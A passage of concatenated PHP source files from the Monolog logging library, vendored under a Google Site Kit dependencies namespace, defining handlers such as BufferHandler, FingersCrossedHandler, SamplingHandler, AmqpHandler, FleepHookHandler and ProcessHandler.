$bubble); if (!\defined('PHP_WINDOWS_VERSION_BUILD')) { $this->facilities['local0'] = \LOG_LOCAL0; $this->facilities['local1'] = \LOG_LOCAL1; $this->facilities['local2'] = \LOG_LOCAL2; $this->facilities['local3'] = \LOG_LOCAL3; $this->facilities['local4'] = \LOG_LOCAL4; $this->facilities['local5'] = \LOG_LOCAL5; $this->facilities['local6'] = \LOG_LOCAL6; $this->facilities['local7'] = \LOG_LOCAL7; } else { $this->facilities['local0'] = 128; // LOG_LOCAL0 $this->facilities['local1'] = 136; // LOG_LOCAL1 $this->facilities['local2'] = 144; // LOG_LOCAL2 $this->facilities['local3'] = 152; // LOG_LOCAL3 $this->facilities['local4'] = 160; // LOG_LOCAL4 $this->facilities['local5'] = 168; // LOG_LOCAL5 $this->facilities['local6'] = 176; // LOG_LOCAL6 $this->facilities['local7'] = 184; // LOG_LOCAL7 } // convert textual description of facility to syslog constant if (\is_string($facility) && \array_key_exists(\strtolower($facility), $this->facilities)) { $facility = $this->facilities[\strtolower($facility)]; } elseif (!\in_array($facility, \array_values($this->facilities), \true)) { throw new \UnexpectedValueException('Unknown facility value "' . $facility . '" given'); } $this->facility = $facility; } /** * {@inheritDoc} */ protected function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\LineFormatter('%channel%.%level_name%: %message% %context% %extra%'); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\ResettableInterface; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; /** * Buffers all records until closing the handler and then pass them as batch. * * This is useful for a MailHandler to send only one mail per request instead of * sending one per log message. * * @author Christophe Coevoet <stof@notk.org> * * @phpstan-import-type Record from \Monolog\Logger */ class BufferHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractHandler implements \Google\Site_Kit_Dependencies\Monolog\Handler\ProcessableHandlerInterface, \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface { use ProcessableHandlerTrait; /** @var HandlerInterface */ protected $handler; /** @var int */ protected $bufferSize = 0; /** @var int */ protected $bufferLimit; /** @var bool */ protected $flushOnOverflow; /** @var Record[] */ protected $buffer = []; /** @var bool */ protected $initialized = \false; /** * @param HandlerInterface $handler Handler. * @param int $bufferLimit How many entries should be buffered at most, beyond that the oldest items are removed from the buffer. * @param bool $flushOnOverflow If true, the buffer is flushed when the max size has been reached, by default oldest entries are discarded */ public function __construct(\Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface $handler, int $bufferLimit = 0, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true, bool $flushOnOverflow = \false) { parent::__construct($level, $bubble); $this->handler = $handler; $this->bufferLimit = $bufferLimit; $this->flushOnOverflow = $flushOnOverflow; } /** * {@inheritDoc} */ public function handle(array $record) : bool { if ($record['level'] < $this->level) { return \false; } if (!$this->initialized) { // __destructor() doesn't get called on Fatal errors \register_shutdown_function([$this, 'close']); $this->initialized = \true; } if ($this->bufferLimit > 0 && $this->bufferSize === $this->bufferLimit) { if ($this->flushOnOverflow) { $this->flush(); } else { \array_shift($this->buffer); $this->bufferSize--; } } if ($this->processors) { /** @var Record $record */ $record = $this->processRecord($record); } $this->buffer[] = $record; $this->bufferSize++; return \false === $this->bubble; } public function flush() : void { if ($this->bufferSize === 0) { return; } $this->handler->handleBatch($this->buffer); $this->clear(); } public function __destruct() { // suppress the parent behavior since we already have register_shutdown_function() // to call close(), and the reference contained there will prevent this from being // GC'd until the end of the request } /** * {@inheritDoc} */ public function close() : void { $this->flush(); $this->handler->close(); } /** * Clears the buffer without flushing any messages down to the wrapped handler. */ public function clear() : void { $this->bufferSize = 0; $this->buffer = []; } public function reset() { $this->flush(); parent::reset(); $this->resetProcessors(); if ($this->handler instanceof \Google\Site_Kit_Dependencies\Monolog\ResettableInterface) { $this->handler->reset(); } } /** * {@inheritDoc} */ public function setFormatter(\Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface $formatter) : \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface { if ($this->handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface) { $this->handler->setFormatter($formatter); return $this; } throw new \UnexpectedValueException('The nested handler of type ' . \get_class($this->handler) . ' does not support formatters.'); } /** * {@inheritDoc} */ public function getFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { if ($this->handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface) { return $this->handler->getFormatter(); } throw new \UnexpectedValueException('The nested handler of type ' . \get_class($this->handler) . ' does not support formatters.'); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; /** * @author Robert Kaufmann III <rok3@rok3.me> */ class LogEntriesHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\SocketHandler { /** * @var string */ protected $logToken; /** * @param string $token Log token supplied by LogEntries * @param bool $useSSL Whether or not SSL encryption should be used. * @param string $host Custom hostname to send the data to if needed * * @throws MissingExtensionException If SSL encryption is set to true and OpenSSL is missing */ public function __construct(string $token, bool $useSSL = \true, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true, string $host = 'data.logentries.com', bool $persistent = \false, float $timeout = 0.0, float $writingTimeout = 10.0, ?float $connectionTimeout = null, ?int $chunkSize = null) { if ($useSSL && !\extension_loaded('openssl')) { throw new \Google\Site_Kit_Dependencies\Monolog\Handler\MissingExtensionException('The OpenSSL PHP plugin is required to use SSL encrypted connection for LogEntriesHandler'); } $endpoint = $useSSL ? 'ssl://' . $host . ':443' : $host . ':80'; parent::__construct($endpoint, $level, $bubble, $persistent, $timeout, $writingTimeout, $connectionTimeout, $chunkSize); $this->logToken = $token; } /** * {@inheritDoc} */ protected function generateDataStream(array $record) : string { return $this->logToken . ' ' . $record['formatted']; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Aws\Sdk; use Google\Site_Kit_Dependencies\Aws\DynamoDb\DynamoDbClient; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Aws\DynamoDb\Marshaler; use Google\Site_Kit_Dependencies\Monolog\Formatter\ScalarFormatter; use Google\Site_Kit_Dependencies\Monolog\Logger; /** * Amazon DynamoDB handler (http://aws.amazon.com/dynamodb/) * * @link https://github.com/aws/aws-sdk-php/ * @author Andrew Lawson <adlawson@gmail.com> */ class DynamoDbHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { public const DATE_FORMAT = 'Y-m-d\\TH:i:s.uO'; /** * @var DynamoDbClient */ protected $client; /** * @var string */ protected $table; /** * @var int */ protected $version; /** * @var Marshaler */ protected $marshaler; public function __construct(\Google\Site_Kit_Dependencies\Aws\DynamoDb\DynamoDbClient $client, string $table, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true) { /** @phpstan-ignore-next-line */ if (\defined('Aws\\Sdk::VERSION') && \version_compare(\Google\Site_Kit_Dependencies\Aws\Sdk::VERSION, '3.0', '>=')) { $this->version = 3; $this->marshaler = new \Google\Site_Kit_Dependencies\Aws\DynamoDb\Marshaler(); } else { $this->version = 2; } $this->client = $client; $this->table = $table; parent::__construct($level, $bubble); } /** * {@inheritDoc} */ protected function write(array $record) : void { $filtered = $this->filterEmptyFields($record['formatted']); if ($this->version === 3) { $formatted = $this->marshaler->marshalItem($filtered); } else { /** @phpstan-ignore-next-line */ $formatted = $this->client->formatAttributes($filtered); } $this->client->putItem(['TableName' => $this->table, 'Item' => $formatted]); } /** * @param mixed[] $record * @return mixed[] */ protected function filterEmptyFields(array $record) : array { return \array_filter($record, function ($value) { return !empty($value) || \false === $value || 0 === $value; }); } /** * {@inheritDoc} */ protected function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\ScalarFormatter(self::DATE_FORMAT); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; /** * Sampling handler * * A sampled event stream can be useful for logging high frequency events in * a production environment where you only need an idea of what is happening * and are not concerned with capturing every occurrence. Since the decision to * handle or not handle a particular event is determined randomly, the * resulting sampled log is not guaranteed to contain 1/N of the events that * occurred in the application, but based on the Law of large numbers, it will * tend to be close to this ratio with a large number of attempts. * * @author Bryan Davis <bd808@wikimedia.org> * @author Kunal Mehta <legoktm@gmail.com> * * @phpstan-import-type Record from \Monolog\Logger * @phpstan-import-type Level from \Monolog\Logger */ class SamplingHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractHandler implements \Google\Site_Kit_Dependencies\Monolog\Handler\ProcessableHandlerInterface, \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface { use ProcessableHandlerTrait; /** * @var HandlerInterface|callable * @phpstan-var HandlerInterface|callable(Record|array{level: Level}|null, HandlerInterface): HandlerInterface */ protected $handler; /** * @var int $factor */ protected $factor; /** * @psalm-param HandlerInterface|callable(Record|array{level: Level}|null, HandlerInterface): HandlerInterface $handler * * @param callable|HandlerInterface $handler Handler or factory callable($record|null, $samplingHandler). * @param int $factor Sample factor (e.g. 10 means every ~10th record is sampled) */ public function __construct($handler, int $factor) { parent::__construct(); $this->handler = $handler; $this->factor = $factor; if (!$this->handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface && !\is_callable($this->handler)) { throw new \RuntimeException("The given handler (" . \json_encode($this->handler) . ") is not a callable nor a Monolog\\Handler\\HandlerInterface object"); } } public function isHandling(array $record) : bool { return $this->getHandler($record)->isHandling($record); } public function handle(array $record) : bool { if ($this->isHandling($record) && \mt_rand(1, $this->factor) === 1) { if ($this->processors) { /** @var Record $record */ $record = $this->processRecord($record); } $this->getHandler($record)->handle($record); } return \false === $this->bubble; } /** * Return the nested handler * * If the handler was provided as a factory callable, this will trigger the handler's instantiation. * * @phpstan-param Record|array{level: Level}|null $record * * @return HandlerInterface */ public function getHandler(?array $record = null) { if (!$this->handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface) { $this->handler = ($this->handler)($record, $this); if (!$this->handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface) { throw new \RuntimeException("The factory callable should return a HandlerInterface"); } } return $this->handler; } /** * {@inheritDoc} */ public function setFormatter(\Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface $formatter) : \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface { $handler = $this->getHandler(); if ($handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface) { $handler->setFormatter($formatter); return $this; } throw new \UnexpectedValueException('The nested handler of type ' . \get_class($handler) . ' does not support formatters.'); } /** * {@inheritDoc} */ public function getFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { $handler = $this->getHandler(); if ($handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface) { return $handler->getFormatter(); } throw new \UnexpectedValueException('The nested handler of type ' . \get_class($handler) . ' does not support formatters.'); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\Formatter\LineFormatter; use Google\Site_Kit_Dependencies\Monolog\Logger; /** * Sends logs to Fleep.io using Webhook integrations * * You'll need a Fleep.io account to use this handler. * * @see https://fleep.io/integrations/webhooks/ Fleep Webhooks Documentation * @author Ando Roots <ando@sqroot.eu> * * @phpstan-import-type FormattedRecord from AbstractProcessingHandler */ class FleepHookHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\SocketHandler { protected const FLEEP_HOST = 'fleep.io'; protected const FLEEP_HOOK_URI = '/hook/'; /** * @var string Webhook token (specifies the conversation where logs are sent) */ protected $token; /** * Construct a new Fleep.io Handler. * * For instructions on how to create a new web hook in your conversations * see https://fleep.io/integrations/webhooks/ * * @param string $token Webhook token * @throws MissingExtensionException */ public function __construct(string $token, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true, bool $persistent = \false, float $timeout = 0.0, float $writingTimeout = 10.0, ?float $connectionTimeout = null, ?int $chunkSize = null) { if (!\extension_loaded('openssl')) { throw new \Google\Site_Kit_Dependencies\Monolog\Handler\MissingExtensionException('The OpenSSL PHP extension is required to use the FleepHookHandler'); } $this->token = $token; $connectionString = 'ssl://' . static::FLEEP_HOST . ':443'; parent::__construct($connectionString, $level, $bubble, $persistent, $timeout, $writingTimeout, $connectionTimeout, $chunkSize); } /** * Returns the default formatter to use with this handler * * Overloaded to remove empty context and extra arrays from the end of the log message. * * @return LineFormatter */ protected function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\LineFormatter(null, null, \true, \true); } /** * Handles a log record */ public function write(array $record) : void { parent::write($record); $this->closeSocket(); } /** * {@inheritDoc} */ protected function generateDataStream(array $record) : string { $content = $this->buildContent($record); return $this->buildHeader($content) . $content; } /** * Builds the header of the API Call */ private function buildHeader(string $content) : string { $header = "POST " . static::FLEEP_HOOK_URI . $this->token . " HTTP/1.1\r\n"; $header .= "Host: " . static::FLEEP_HOST . "\r\n"; $header .= "Content-Type: application/x-www-form-urlencoded\r\n"; $header .= "Content-Length: " . \strlen($content) . "\r\n"; $header .= "\r\n"; return $header; } /** * Builds the body of API call * * @phpstan-param FormattedRecord $record */ private function buildContent(array $record) : string { $dataArray = ['message' => $record['formatted']]; return \http_build_query($dataArray); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Handler\FingersCrossed\ErrorLevelActivationStrategy; use Google\Site_Kit_Dependencies\Monolog\Handler\FingersCrossed\ActivationStrategyInterface; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\ResettableInterface; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Psr\Log\LogLevel; /** * Buffers all records until a certain level is reached * * The advantage of this approach is that you don't get any clutter in your log files. * Only requests which actually trigger an error (or whatever your actionLevel is) will be * in the logs, but they will contain all records, not only those above the level threshold. * * You can then have a passthruLevel as well which means that at the end of the request, * even if it did not get activated, it will still send through log records of e.g. at least a * warning level. * * You can find the various activation strategies in the * Monolog\Handler\FingersCrossed\ namespace. * * @author Jordi Boggiano <j.boggiano@seld.be> * * @phpstan-import-type Record from \Monolog\Logger * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger */ class FingersCrossedHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\Handler implements \Google\Site_Kit_Dependencies\Monolog\Handler\ProcessableHandlerInterface, \Google\Site_Kit_Dependencies\Monolog\ResettableInterface, \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface { use ProcessableHandlerTrait; /** * @var callable|HandlerInterface * @phpstan-var callable(?Record, HandlerInterface): HandlerInterface|HandlerInterface */ protected $handler; /** @var ActivationStrategyInterface */ protected $activationStrategy; /** @var bool */ protected $buffering = \true; /** @var int */ protected $bufferSize; /** @var Record[] */ protected $buffer = []; /** @var bool */ protected $stopBuffering; /** * @var ?int * @phpstan-var ?Level */ protected $passthruLevel; /** @var bool */ protected $bubble; /** * @psalm-param HandlerInterface|callable(?Record, HandlerInterface): HandlerInterface $handler * * @param callable|HandlerInterface $handler Handler or factory callable($record|null, $fingersCrossedHandler). * @param int|string|ActivationStrategyInterface $activationStrategy Strategy which determines when this handler takes action, or a level name/value at which the handler is activated * @param int $bufferSize How many entries should be buffered at most, beyond that the oldest items are removed from the buffer. * @param bool $bubble Whether the messages that are handled can bubble up the stack or not * @param bool $stopBuffering Whether the handler should stop buffering after being triggered (default true) * @param int|string $passthruLevel Minimum level to always flush to handler on close, even if strategy not triggered * * @phpstan-param Level|LevelName|LogLevel::* $passthruLevel * @phpstan-param Level|LevelName|LogLevel::*|ActivationStrategyInterface $activationStrategy */ public function __construct($handler, $activationStrategy = null, int $bufferSize = 0, bool $bubble = \true, bool $stopBuffering = \true, $passthruLevel = null) { if (null === $activationStrategy) { $activationStrategy = new \Google\Site_Kit_Dependencies\Monolog\Handler\FingersCrossed\ErrorLevelActivationStrategy(\Google\Site_Kit_Dependencies\Monolog\Logger::WARNING); } // convert simple int activationStrategy to an object if (!$activationStrategy instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\FingersCrossed\ActivationStrategyInterface) { $activationStrategy = new \Google\Site_Kit_Dependencies\Monolog\Handler\FingersCrossed\ErrorLevelActivationStrategy($activationStrategy); } $this->handler = $handler; $this->activationStrategy = $activationStrategy; $this->bufferSize = $bufferSize; $this->bubble = $bubble; $this->stopBuffering = $stopBuffering; if ($passthruLevel !== null) { $this->passthruLevel = \Google\Site_Kit_Dependencies\Monolog\Logger::toMonologLevel($passthruLevel); } if (!$this->handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface && !\is_callable($this->handler)) { throw new \RuntimeException("The given handler (" . \json_encode($this->handler) . ") is not a callable nor a Monolog\\Handler\\HandlerInterface object"); } } /** * {@inheritDoc} */ public function isHandling(array $record) : bool { return \true; } /** * Manually activate this logger regardless of the activation strategy */ public function activate() : void { if ($this->stopBuffering) { $this->buffering = \false; } $this->getHandler(\end($this->buffer) ?: null)->handleBatch($this->buffer); $this->buffer = []; } /** * {@inheritDoc} */ public function handle(array $record) : bool { if ($this->processors) { /** @var Record $record */ $record = $this->processRecord($record); } if ($this->buffering) { $this->buffer[] = $record; if ($this->bufferSize > 0 && \count($this->buffer) > $this->bufferSize) { \array_shift($this->buffer); } if ($this->activationStrategy->isHandlerActivated($record)) { $this->activate(); } } else { $this->getHandler($record)->handle($record); } return \false === $this->bubble; } /** * {@inheritDoc} */ public function close() : void { $this->flushBuffer(); $this->getHandler()->close(); } public function reset() { $this->flushBuffer(); $this->resetProcessors(); if ($this->getHandler() instanceof \Google\Site_Kit_Dependencies\Monolog\ResettableInterface) { $this->getHandler()->reset(); } } /** * Clears the buffer without flushing any messages down to the wrapped handler. * * It also resets the handler to its initial buffering state. */ public function clear() : void { $this->buffer = []; $this->reset(); } /** * Resets the state of the handler. Stops forwarding records to the wrapped handler. */ private function flushBuffer() : void { if (null !== $this->passthruLevel) { $level = $this->passthruLevel; $this->buffer = \array_filter($this->buffer, function ($record) use($level) { return $record['level'] >= $level; }); if (\count($this->buffer) > 0) { $this->getHandler(\end($this->buffer))->handleBatch($this->buffer); } } $this->buffer = []; $this->buffering = \true; } /** * Return the nested handler * * If the handler was provided as a factory callable, this will trigger the handler's instantiation. * * @return HandlerInterface * * @phpstan-param Record $record */ public function getHandler(?array $record = null) { if (!$this->handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface) { $this->handler = ($this->handler)($record, $this); if (!$this->handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface) { throw new \RuntimeException("The factory callable should return a HandlerInterface"); } } return $this->handler; } /** * {@inheritDoc} */ public function setFormatter(\Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface $formatter) : \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface { $handler = $this->getHandler(); if ($handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface) { $handler->setFormatter($formatter); return $this; } throw new \UnexpectedValueException('The nested handler of type ' . \get_class($handler) . ' does not support formatters.'); } /** * {@inheritDoc} */ public function getFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { $handler = $this->getHandler(); if ($handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface) { return $handler->getFormatter(); } throw new \UnexpectedValueException('The nested handler of type ' . \get_class($handler) . ' does not support formatters.'); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Psr\Log\LogLevel; /** * Blackhole * * Any record it can handle will be thrown away. This can be used * to put on top of an existing stack to override it temporarily. * * @author Jordi Boggiano <j.boggiano@seld.be> * * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger */ class NullHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\Handler { /** * @var int */ private $level; /** * @param string|int $level The minimum logging level at which this handler will be triggered * * @phpstan-param Level|LevelName|LogLevel::* $level */ public function __construct($level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG) { $this->level = \Google\Site_Kit_Dependencies\Monolog\Logger::toMonologLevel($level); } /** * {@inheritDoc} */ public function isHandling(array $record) : bool { return $record['level'] >= $this->level; } /** * {@inheritDoc} */ public function handle(array $record) : bool { return $record['level'] >= $this->level; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\Formatter\JsonFormatter; use Google\Site_Kit_Dependencies\PhpAmqpLib\Message\AMQPMessage; use Google\Site_Kit_Dependencies\PhpAmqpLib\Channel\AMQPChannel; use AMQPExchange; /** * @phpstan-import-type Record from \Monolog\Logger */ class AmqpHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** * @var AMQPExchange|AMQPChannel $exchange */ protected $exchange; /** @var array<string, mixed> */ private $extraAttributes = []; /** * @return array<string, mixed> */ public function getExtraAttributes() : array { return $this->extraAttributes; } /** * Configure extra attributes to pass to the AMQPExchange (if you are using the amqp extension) * * @param array<string, mixed> $extraAttributes One of content_type, content_encoding, * message_id, user_id, app_id, delivery_mode, * priority, timestamp, expiration, type * or reply_to, headers. * @return AmqpHandler */ public function setExtraAttributes(array $extraAttributes) : self { $this->extraAttributes = $extraAttributes; return $this; } /** * @var string */ protected $exchangeName; /** * @param AMQPExchange|AMQPChannel $exchange AMQPExchange (php AMQP ext) or PHP AMQP lib channel, ready for use * @param string|null $exchangeName Optional exchange name, for AMQPChannel (PhpAmqpLib) only */ public function __construct($exchange, ?string $exchangeName = null, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true) { if ($exchange instanceof \Google\Site_Kit_Dependencies\PhpAmqpLib\Channel\AMQPChannel) { $this->exchangeName = (string) $exchangeName; } elseif (!$exchange instanceof \AMQPExchange) { throw new \InvalidArgumentException('PhpAmqpLib\\Channel\\AMQPChannel or AMQPExchange instance required'); } elseif ($exchangeName) { @\trigger_error('The $exchangeName parameter can only be passed when using PhpAmqpLib, if using an AMQPExchange instance configure it beforehand', \E_USER_DEPRECATED); } $this->exchange = $exchange; parent::__construct($level, $bubble); } /** * {@inheritDoc} */ protected function write(array $record) : void { $data = $record["formatted"]; $routingKey = $this->getRoutingKey($record); if ($this->exchange instanceof \AMQPExchange) { $attributes = ['delivery_mode' => 2, 'content_type' => 'application/json']; if ($this->extraAttributes) { $attributes = \array_merge($attributes, $this->extraAttributes); } $this->exchange->publish($data, $routingKey, 0, $attributes); } else { $this->exchange->basic_publish($this->createAmqpMessage($data), $this->exchangeName, $routingKey); } } /** * {@inheritDoc} */ public function handleBatch(array $records) : void { if ($this->exchange instanceof \AMQPExchange) { parent::handleBatch($records); return; } foreach ($records as $record) { if (!$this->isHandling($record)) { continue; } /** @var Record $record */ $record = $this->processRecord($record); $data = $this->getFormatter()->format($record); $this->exchange->batch_basic_publish($this->createAmqpMessage($data), $this->exchangeName, $this->getRoutingKey($record)); } $this->exchange->publish_batch(); } /** * Gets the routing key for the AMQP exchange * * @phpstan-param Record $record */ protected function getRoutingKey(array $record) : string { $routingKey = \sprintf('%s.%s', $record['level_name'], $record['channel']); return \strtolower($routingKey); } private function createAmqpMessage(string $data) : \Google\Site_Kit_Dependencies\PhpAmqpLib\Message\AMQPMessage { $attributes = ['delivery_mode' => 2, 'content_type' => 'application/json']; if ($this->extraAttributes) { $attributes = \array_merge($attributes, $this->extraAttributes); } return new \Google\Site_Kit_Dependencies\PhpAmqpLib\Message\AMQPMessage($data, $attributes); } /** * {@inheritDoc} */ protected function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\JsonFormatter(\Google\Site_Kit_Dependencies\Monolog\Formatter\JsonFormatter::BATCH_MODE_JSON, \false); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; /** * Stores to STDIN of any process, specified by a command. * * Usage example: * <pre> * $log = new Logger('myLogger'); * $log->pushHandler(new ProcessHandler('/usr/bin/php /var/www/monolog/someScript.php')); * </pre> * * @author Kolja Zuelsdorf <koljaz@web.de> */ class ProcessHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** * Holds the process to receive data on its STDIN. * * @var resource|bool|null */ private $process; /** * @var string */ private $command; /** * @var string|null */ private $cwd; /** * @var resource[] */ private $pipes = []; /** * @var array<int, string[]> */ protected const DESCRIPTOR_SPEC = [ 0 => ['pipe', 'r'], // STDIN is a pipe that the child will read from 1 => ['pipe', 'w'], // STDOUT is a pipe that the child will write to 2 => ['pipe', 'w'], ]; /** * @param string $command Command for the process to start. Absolute paths are recommended, * especially if you do not use the $cwd parameter. * @param string|null $cwd "Current working directory" (CWD) for the process to be executed in. * @throws \InvalidArgumentException */ public function __construct(string $command, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true, ?string $cwd = null) { if ($command === '') { throw new \InvalidArgumentException('The command argument must be a non-empty string.'); } if ($cwd === '') { throw new \InvalidArgumentException('The optional CWD argument must be a non-empty string or null.'); } parent::__construct($level, $bubble); $this->command = $command; $this->cwd = $cwd; } /** * Writes the record down to the log of the implementing handler * * @throws \UnexpectedValueException */ protected function write(array $record) : void { $this->ensureProcessIsStarted(); $this->writeProcessInput($record['formatted']); $errors = $this->readProcessErrors(); if (empty($errors) === \false) { throw new \UnexpectedValueException(\sprintf('Errors while writing to process: %s', $errors)); } } /** * Makes sure that the process is actually started, and if not, starts it, * assigns the stream pipes, and handles startup errors, if any. */ private function ensureProcessIsStarted() : void { if (\is_resource($this->process) === \false) { $this->startProcess(); $this->handleStartupErrors(); } } /** * Starts the actual process and sets all streams to non-blocking. */ private function startProcess() : void { $this->process = \proc_open($this->command, static::DESCRIPTOR_SPEC, $this->pipes, $this->cwd); foreach ($this->pipes as $pipe) { \stream_set_blocking($pipe, \false); } } /** * Selects the STDERR stream, handles upcoming startup errors, and throws an exception, if any. * * @throws \UnexpectedValueException */ private function handleStartupErrors() : void { $selected = $this->selectErrorStream(); if (\false === $selected) { throw new \UnexpectedValueException('Something went wrong while selecting a stream.'); } $errors = $this->readProcessErrors(); if (\is_resource($this->process) === \false || empty($errors) === \false) { throw new \UnexpectedValueException(\sprintf('The process "%s" could not be opened: ' . $errors, $this->command)); } } /** * Selects the STDERR stream. * * @return int|bool */ protected function selectErrorStream() { $empty = []; $errorPipes = [$this->pipes[2]]; return \stream_select($errorPipes, $empty, $empty, 1); } /** * Reads the errors of the process, if there are any. * * @codeCoverageIgnore * @return string Empty string if there are no errors. */ protected function readProcessErrors() : string { return (string) \stream_get_contents($this->pipes[2]); } /** * Writes to the input stream of the opened process. * * @codeCoverageIgnore */ protected function writeProcessInput(string $string) : void { \fwrite($this->pipes[0], $string); } /** * {@inheritDoc} */ public function close() : void { if (\is_resource($this->process)) { foreach ($this->pipes as $pipe) { \fclose($pipe); } \proc_close($this->process); $this->process = null; } } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed 